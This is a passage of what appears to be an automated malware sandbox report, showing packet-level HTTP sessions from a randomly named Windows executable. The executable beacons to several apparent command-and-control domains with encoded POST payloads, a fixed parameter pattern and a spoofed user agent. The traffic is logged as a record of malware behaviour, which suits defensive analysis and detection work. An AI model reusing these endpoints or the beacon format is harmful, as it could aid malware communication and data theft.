                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:50.524524927 CEST | Bytes transferred: 380 | Direction: IN
                                                                                                                                                                 Data Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB


                                                                                                                                                                 Session ID: 38 | Source IP: 192.168.11.30 | Source Port: 49859 | Destination IP: 23.227.38.74 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:52.769571066 CEST | Bytes transferred: 627 | Direction: OUT
                                                                                                                                                                 POST /c0mi/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.zingara.life
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.zingara.life
                                                                                                                                                                Referer: http://www.zingara.life/c0mi/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 79 6f 70 76 4b 67 57 4a 41 4d 4a 56 41 43 66 72 68 45 32 4e 70 73 78 31 76 55 69 7a 2b 4b 73 77 4d 34 70 75 45 38 6b 52 46 54 49 6a 31 2f 6a 42 75 36 78 50 68 63 76 75 71 41 4e 73 4a 53 53 42 37 64 62 71 58 46 76 4c 48 56 31 69 32 31 4b 65 64 71 64 69 4e 62 66 79 36 43 42 42 38 78 79 6b 49 65 63 4d 70 47 61 67 70 43 52 69 59 51 4c 55 4d 58 6b 5a 72 46 5a 4d 34 59 35 56 36 56 35 77 77 4e 41 6f 64 71 75 71 67 65 58 42 65 59 6d 5a 57 34 6c 6c 4a 31 68 39 70 64 74 74 46 47 7a 78 65 48 45 34 34 2b 6c 4b 31 47 5a 66 67 4f 69 71 7a 49 55 39 42 70 6c 4d 37 43 39 2b 44 32 73 71 55 37 6b 78 38 50 55 58 74 42 77 31 77 45 37 76 50 32 74 52 46 49 63 3d
                                                                                                                                                                Data Ascii: nhl=yopvKgWJAMJVACfrhE2Npsx1vUiz+KswM4puE8kRFTIj1/jBu6xPhcvuqANsJSSB7dbqXFvLHV1i21KedqdiNbfy6CBB8xykIecMpGagpCRiYQLUMXkZrFZM4Y5V6V5wwNAodquqgeXBeYmZW4llJ1h9pdttFGzxeHE44+lK1GZfgOiqzIU9BplM7C9+D2sqU7kx8PUXtBw1wE7vP2tRFIc=
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:53.654623032 CEST | Bytes transferred: 1289 | Direction: IN
                                                                                                                                                                 HTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:53 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-sorting-hat-podid: 156
                                                                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                x-shopid: 68129128605
                                                                                                                                                                x-shardid: 156
                                                                                                                                                                content-language: en-IN
                                                                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:53 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_y=4c54a4ea-beee-4680-9a75-6cf216a3001a; Expires=Thu, 09-Oct-25 11:04:53 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_s=0d286487-46fd-43a6-a5f2-12cc4ec5e7eb; Expires=Wed, 09-Oct-24 11:34:53 GMT; Domain=zingara.life; Path=/; SameSite=
                                                                                                                                                                Data Raw:
                                                                                                                                                                Data Ascii:
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:53.654690027 CEST | Bytes transferred: 1251 | Direction: IN
                                                                                                                                                                 Data Raw: 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 62 66 62 30 31 31 63 37 2d 30 65 32 30 2d 34 33 39 66 2d 39 31 63 62 2d 37 30 30 32 35 35 34 62 30 32 66 66 2d 31 37 32 38 34 37 31 38 39 32 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20
                                                                                                                                                                Data Ascii: axx-request-id: bfb011c7-0e20-439f-91cb-7002554b02ff-1728471892server-timing: processing;dur=734content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:53.654738903 CEST | Bytes transferred: 1289 | Direction: IN
                                                                                                                                                                 Data Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:53.654752970 CEST | Bytes transferred: 380 | Direction: IN
                                                                                                                                                                 Data Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB


                                                                                                                                                                 Session ID: 39 | Source IP: 192.168.11.30 | Source Port: 49860 | Destination IP: 23.227.38.74 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:55.408767939 CEST | Bytes transferred: 1289 | Direction: OUT
                                                                                                                                                                 POST /c0mi/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.zingara.life
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.zingara.life
                                                                                                                                                                Referer: http://www.zingara.life/c0mi/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 79 6f 70 76 4b 67 57 4a 41 4d 4a 56 41 43 66 72 68 45 32 4e 70 73 78 31 76 55 69 7a 2b 4b 73 77 4d 34 70 75 45 38 6b 52 46 54 41 6a 31 73 72 42 75 63 35 50 67 63 76 75 6a 67 4e 68 4a 53 54 45 37 64 44 75 58 41 33 62 48 54 78 69 33 58 75 65 4a 4c 64 69 47 62 66 79 34 43 42 41 32 52 79 4c 49 65 73 49 70 47 4b 67 70 43 52 69 59 54 6a 55 4c 43 45 5a 37 31 5a 54 2f 59 35 52 74 46 35 63 77 4a 73 34 64 71 61 63 67 62 6a 42 65 70 32 5a 56 4b 4e 6c 4a 31 68 39 39 74 74 73 46 47 2f 79 65 48 63 53 34 36 59 6f 31 33 39 66 68 34 44 76 30 37 73 30 64 34 4a 51 7a 79 4a 49 58 41 73 75 55 73 55 4f 74 2b 55 52 71 78 30 2f 2f 6b 50 56 4d 56 4e 45 65 76 54 79 69 67 2b 63 57 73 32 46 76 35 43 33 75 31 31 6d 37 70 55 69 53 78 41 64 54 52 78 57 71 76 35 71 51 2f 4b 72 76 4f 6d 2f 32 56 4b 74 6c 7a 7a 73 55 2b 51 30 61 48 43 6a 4c 50 53 51 71 46 51 58 74 75 64 4b 35 71 55 49 52 77 48 65 68 79 4c 66 41 39 65 64 4c 6c 73 76 44 71 46 6e 65 6a 45 66 6c 44 46 2f 77 47 52 61 74 59 45 49 59 49 36 4a 35 30 70 7a 73 55 [TRUNCATED]
    Data Ascii: nhl=[TRUNCATED]
Oct 9, 2024 13:04:55.408817053 CEST | 2455 | OUT | Data Raw: 57 44 32 36 79 55 6a 39 74 37 6d 61 4c 6e 50 66 69 34 51 77 6d 76 6a 78 32 6d 2f 59 46 77 73 49 39 55 55 77 4d 47 35 78 6a 33 6d 75 7a 6c 42 4e 7a 79 48 79 79 31 55 55 67 5a 6b 77 35 2b 69 4a 43 6d 72 70 6e 49 53 37 46 2f 63 78 6a 31 71 52 39 7a
    Data Ascii: WD26yUj9t7maLnPfi4Qwmvjx2m/YFwsI9UUwMG5xj3muzlBNzyHyy1UUgZkw5+iJCmrpnIS7F/cxj1qR9zt+MwlksiBFy1X4qiD+Q7Zc7SuFbmMcwp8Sw531jQHzx0tZCRRqe/BJK3Wi7+Lm3M2+VtZVxTIZg2M1tJG3UPrceUWTooOPeNgiJr/twU7sKgXHVjIqGhjFIBA8vTPU6KbbwRHab83L6YiIvHpaLexpjSGF2jLLEQ4
Oct 9, 2024 13:04:55.775000095 CEST | 1289 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 09 Oct 2024 11:04:55 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-sorting-hat-podid: 156
    x-sorting-hat-shopid: 68129128605
    vary: Accept-Encoding,Accept
    x-frame-options: DENY
    x-shopid: 68129128605
    x-shardid: 156
    content-language: en-IN
    x-shopify-nginx-no-cookies: 0
    set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Lax
    set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Lax
    set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:55 GMT; SameSite=Lax
    set-cookie: _shopify_y=101d33f6-59dc-43c5-a1bb-c6ef86b34ba2; Expires=Thu, 09-Oct-25 11:04:55 GMT; Domain=zingara.life; Path=/; SameSite=Lax
    set-cookie: _shopify_s=9dea918b-c5fe-4834-b024-5be6d8b36844; Expires=Wed, 09-Oct-24 11:34:55 GMT; Domain=zingara.life; Path=/; SameSite=
Oct 9, 2024 13:04:55.775073051 CEST | 1283 | IN | Data Raw: 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 65 33 31 35 31 66 62 32 2d 30 36 62 63 2d 34 37 63 35 2d 61 33 35 64 2d 35 30 38 37 35 39 66 32 62 36 66 38 2d 31 37 32 38 34 37 31 38 39 35 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20
    Data Ascii: axx-request-id: e3151fb2-06bc-47c5-a35d-508759f2b6f8-1728471895server-timing: processing;dur=172content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
Oct 9, 2024 13:04:55.775221109 CEST | 1289 | IN | Data Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
    Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
Oct 9, 2024 13:04:55.775304079 CEST | 375 | IN | Data Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
    Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB
Oct 9, 2024 13:04:55.775315046 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.30 | 49861 | 23.227.38.74 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:58.045490026 CEST | 346 | OUT | GET /c0mi/?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y= HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.zingara.life
    Connection: close
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:04:58.270699024 CEST | 1289 | IN | HTTP/1.1 301 Moved Permanently
    Date: Wed, 09 Oct 2024 11:04:58 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 0
    Connection: close
    x-sorting-hat-podid: 156
    x-sorting-hat-shopid: 68129128605
    x-storefront-renderer-rendered: 1
    location: https://zingara.life/c0mi?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y=
    x-redirect-reason: https_required
    x-frame-options: DENY
    content-security-policy: frame-ancestors 'none';
    x-shopid: 68129128605
    x-shardid: 156
    vary: Accept
    powered-by: Shopify
    server-timing: processing;dur=9;desc="gc:1", db;dur=2, db_async;dur=6.607, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="lxkz", requestID;desc="12b50a6d-452b-4138-9b0c-26fd9e3c7d39-1728471898"
    x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
    x-request-id: 12b50a6d-452b-4138-9b0c-26fd9e3c7d39-1728471898
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aEMl2x6I6aIeOEpdRzTkER10TjldZ%2BzcqOM5oDlsaMmCnCwNWxo7hJd2x8hPSFI06TkppBxzVNDsSdfDVPUGBbnmREWAgIrZH%2BON7lPhy%2BPsbvc1iMtuMePcb2oPeOPawiw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0.01,"report_to":"cf-nel","
Oct 9, 2024 13:04:58.271025896 CEST | 253 | IN | Data Raw: 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 31 32 38 2e 39 39 39 39 34 39 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e
    Data Ascii: ax_age":604800}Server-Timing: cfRequestDuration;dur=128.999949X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8cfde4931cc2c4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.30 | 49862 | 84.32.84.32 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:03.731158972 CEST | 622 | OUT | POST /1jig/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.thepeatear.online
    Cache-Control: max-age=0
    Content-Length: 200
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.thepeatear.online
    Referer: http://www.thepeatear.online/1jig/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
    Data Ascii: nhl=CeFR25mDwMUrWRApiZ7k/FZ5/GRHocCkEQ2olflgfMXL7oxc47dGR2rIfpxR/F1INcg29R/wvOLxw6bQ3Z4j47wXrkeArYtONmLXZwkjUP7GtyiePhnmZAE912wzgxJouaDWdvTUnDKvMyQcStQFqsoq0a46TIBDuh3kLq37ZHK4a/eOShVJSaCf8fWaK2SbWA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.30 | 49863 | 84.32.84.32 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:06.366782904 CEST | 642 | OUT | POST /1jig/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.thepeatear.online
    Cache-Control: max-age=0
    Content-Length: 220
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.thepeatear.online
    Referer: http://www.thepeatear.online/1jig/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
    Data Ascii: nhl=CeFR25mDwMUrQwQpyI7kvVZ6j2RHh8CoEQyolb1wfa/L+85c76dGQ2rIKZxUg115NckI9V/wvOPxw7HQ3pEg4rwVgEeCvYtONmLXZxUFUPDGtDSeMDfnQgEi8WwzkxJ0uaCzduPynByvM3UcT58Glsooqa5+V58hoh/NF5X4WkSNWIvUPihLB6+yge7yI0TALHTznqgI5dxTE1xQt2CJQpA=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.30 | 49864 | 84.32.84.32 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:09.004106998 CEST | 1289 | OUT | POST /1jig/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.thepeatear.online
    Cache-Control: max-age=0
    Content-Length: 3336
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.thepeatear.online
    Referer: http://www.thepeatear.online/1jig/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
    Data Ascii: nhl=[TRUNCATED]
Oct 9, 2024 13:05:09.004156113 CEST | 2470 | OUT | Data Raw: 62 4c 63 4e 6a 68 69 76 38 62 2b 68 53 49 72 74 50 4d 6b 68 46 4a 6d 72 42 68 4e 65 5a 4c 64 70 53 74 6d 31 31 47 70 44 6d 38 57 4a 33 49 51 6e 74 6e 34 49 6d 48 49 50 69 70 32 36 4f 70 56 39 7a 56 6d 33 76 57 44 63 56 33 62 73 39 6d 77 79 55 34
    Data Ascii: bLcNjhiv8b+hSIrtPMkhFJmrBhNeZLdpStm11GpDm8WJ3IQntn4ImHIPip26OpV9zVm3vWDcV3bs9mwyU4O3bob/Klx1tCNV/oeu+q30d+0+otrwwiRxYzr+bgh0wFeU6Yde2pb6pKITfhxI0sf+S3b8TurdjYjxh050hFxsqMPDSkT/wugpSMRbJI5+8JerCydcQoVkAparYZkRF20me4e9ItAunnDnJ/Lxmk5f6ZltxIbzOUM


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                44192.168.11.304986584.32.84.32806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:11.646508932 CEST | 351 | OUT | GET /1jig/?nhl=Pctx1PqJ8MApDnItio/Z+EFnrX0P+O6aDAf1ocJJBNfVobZUkvZZH3rRaqwxixVCcZIN7U7Xpqfz9fbsrPgf8JYUk12Pjtd3LjDyQQ9aa4jR42mhfhGkGD0=&9X=EvKH2xeP-DpP307P HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.thepeatear.online
    Connection: close
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:05:11.747112989 CEST | 1289 | IN | HTTP/1.1 200 OK
    Server: hcdn
    Date: Wed, 09 Oct 2024 11:05:11 GMT
    Content-Type: text/html
    Content-Length: 10072
    Connection: close
    Vary: Accept-Encoding
    alt-svc: h3=":443"; ma=86400
    x-hcdn-request-id: dd44d0967ff34e926ebffc1b8f2b8889-bos-edge3
    Expires: Wed, 09 Oct 2024 11:05:10 GMT
    Cache-Control: no-cache
    Accept-Ranges: bytes
    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
Oct 9, 2024 13:05:11.747235060 CEST | 1289 | IN | Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
Oct 9, 2024 13:05:11.747361898 CEST | 1289 | IN | Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
Oct 9, 2024 13:05:11.747375965 CEST | 1289 | IN | Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
Oct 9, 2024 13:05:11.747483969 CEST | 1289 | IN | Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
Oct 9, 2024 13:05:11.747498989 CEST | 1289 | IN | Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
Oct 9, 2024 13:05:11.747512102 CEST | 1289 | IN | Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
Oct 9, 2024 13:05:11.747571945 CEST | 1289 | IN | Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
Oct 9, 2024 13:05:11.747582912 CEST | 100 | IN | Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.30 | 49866 | 54.67.42.145 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:17.149975061 CEST | 610 | OUT | POST /7cee/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.kx507981.shop
    Cache-Control: max-age=0
    Content-Length: 200
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.kx507981.shop
    Referer: http://www.kx507981.shop/7cee/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
    Data Ascii: nhl=GMdVftKtJN7zjZdiHjYsS2FsEjlPoH977YchUkh7GrWmpYS7+f3k3pIvebxtlGhOEE8tkL6pN6dRJK36PxP/aPFrxXU6jEGtzpt0sMi0zwRiofl3U+JthJDu35ppilu9RFesaOy1ObcUsy6x6HqXZd9hbY3RgKhNHQgnknupjUpW9gf6LDmYjcMN8yvevo/9ig==
Oct 9, 2024 13:05:17.304627895 CEST | 296 | IN | HTTP/1.1 301 Moved Permanently
    content-type: text/plain
    date: Wed, 09 Oct 2024 11:05:17 GMT
    content-length: 0
    x-frame-options: SAMEORIGIN
    strict-transport-security: max-age=2592000
    cache-control: no-cache, no-store, must-revalidate
    expires: 631152000000
    location: http://kx507945.shop


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
